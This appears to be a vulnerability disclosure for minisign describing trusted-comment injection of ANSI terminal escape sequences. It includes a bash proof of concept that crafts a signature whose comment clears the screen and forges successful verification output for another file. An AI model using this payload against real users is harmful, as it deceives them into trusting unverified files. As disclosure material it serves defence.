Trusted comment Injection (minisign)
A vulnerability in minisign allows attackers to craft signatures whose trusted comment field contains malicious terminal escape sequences or misleading commands.
Impact
Exploitation enables attackers to deceive users during signature verification by injecting terminal control sequences. This can clear the terminal and overwrite the prompt with a forged command invocation, making it appear as if a different file and signature were successfully verified, or generally confuse them about the content of the trusted comment and another program output.
Details
minisign supports attaching metadata in a trusted comment to a signature. The trusted comment is stored in plaintext inside the .minisig file and displayed to the user during verification.
However, no sanitization or escaping is applied before printing. Arbitrary byte sequences, including ANSI escape codes, may be inserted.
An attacker can therefore craft a signature whose trusted comment injects terminal sequences that erase the previous output and replace it with a forged verification command line for a different file.
Generally, it is considered best practice for CLI tools, especially cryptographic CLI tools, to not print potentially attacker controlled CLI tools, or at least first tell the user that what follows is binary output, with a [y/N] style prompt.
Scenario
Bob is verifying multiple, potentially many, messages from different singers. One of them Alice, who sent msg2.txt with signature msg2.txt.minisig. Bob previously obtained Alice’s public key pubkey2.txt through a secure channel. Another message, comes from Mallory, who’s public key pubkey1.txt Bob also previously obtained. Mallory holds a MITM on Bob’s connection with Alice. When Alice sends her message, Mallory switches it out for a malicious one, but leaves the original signature file unchanged. Furthermore, Mallory crafts a special message of her own, that leads to a terminal output crafted to deceive Bob into thinking that he verified the signature of Alice’s message successfully.
Detailed Steps to Reproduce
Alice crafts her message in the following way
#!/bin/bash
echo 'Hello world' > msg1.txt
echo "Creating a minisign key pair..."
rm pubkey1.txt seckey1.txt msg1.txt.minisig | true
minisign -G -W -p pubkey1.txt -s seckey1.txt <<<'[email protected]'
# can use everything but \r and \n in here.
# instead we use \e[1E
# alternatively it could instruct the user to update the software from a mallicious source
tc=$'\e[2J\e[H$ minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisig\e[1ESignature and comment signature verified\e[1ETrusted comment: timestamp:1755343355\tfile:msg2.txt\thashed\e[1Eminisign -V -p pubkey2.txt -m msg2.txt -x msg2.txt.minisig\e[1ESignature and comment signature verified\e[1ETrusted comment: timestamp:1755343359\tfile:msg2.txt\thashed'
minisign -S -s seckey1.txt -m msg1.txt -t "$tc"
# Bob then executes:
minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisigBob then executes
$ minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisigand gets the following output on his terminal.
$ minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisig
Signature and comment signature verified
Trusted comment: timestamp:1755343355 file:msg2.txt hashed
$ minisign -V -p pubkey2.txt -m msg2.txt -x msg2.txt.minisig
Signature and comment signature verified
Trusted comment: timestamp:1755343359 file:msg2.txt hashedIf Bob is inattentive, he might be tricked into thinking that he already verified Alice’s message.